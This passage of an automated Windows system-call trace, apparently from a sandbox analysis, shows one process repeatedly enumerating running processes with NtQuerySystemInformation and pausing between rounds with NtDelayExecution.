[0132.403] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0132.404] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0132.414] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0132.415] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0132.415] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0132.415] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0132.416] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0132.418] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0132.419] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0132.430] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0132.430] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0132.431] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0132.431] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0132.431] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0132.434] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0132.434] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0132.444] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0132.445] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0132.445] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0132.446] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0132.446] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0132.448] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0132.449] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0132.461] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0132.461] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0132.462] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0132.462] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0132.462] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0132.465] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0132.466] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0132.477] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0132.478] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0132.479] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0132.480] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0132.481] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0132.488] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0132.489] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0132.491] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0132.492] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0132.492] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0132.492] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0132.492] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0132.494] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0132.495] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0132.507] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0132.507] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0132.508] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0132.508] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0132.508] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0132.510] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0132.511] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0132.529] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0132.529] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0132.530] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0132.530] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0132.530] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0132.533] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0132.534] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0132.545] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0132.545] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0132.546] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0132.546] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0132.546] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0132.548] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0132.548] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0132.554] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0132.554] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0132.554] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0132.555] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0132.555] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0132.557] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0132.558] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0132.569] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0132.569] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0132.570] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0132.570] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0132.570] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0132.573] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0132.574] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0132.585] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0132.585] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0132.586] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0132.586] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0132.586] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0132.589] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0132.589] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0132.607] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0132.607] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0132.608] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0132.608] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0132.608] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0132.610] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0132.617] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0132.623] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0132.623] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0132.624] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0132.624] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0132.624] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0132.626] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0132.627] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0132.633] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0132.633] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0132.633] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0132.634] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0132.634] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0132.637] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0132.637] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0132.647] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0132.648] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0132.649] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0132.649] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0132.649] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0132.652] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0132.652] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0132.663] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0132.663] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0132.664] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0132.664] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0132.667] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0132.673] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0132.674] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0132.679] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0132.680] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0132.681] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0132.681] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0132.681] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0132.684] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0132.685] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0132.694] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0132.695] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0132.695] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0132.695] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0132.696] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0132.698] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0132.699] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0132.714] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0132.714] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0132.715] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0132.715] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0132.715] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0132.717] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0132.718] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0132.727] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0132.727] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0132.728] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0132.729] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0132.729] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0132.731] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0132.732] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0132.773] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, 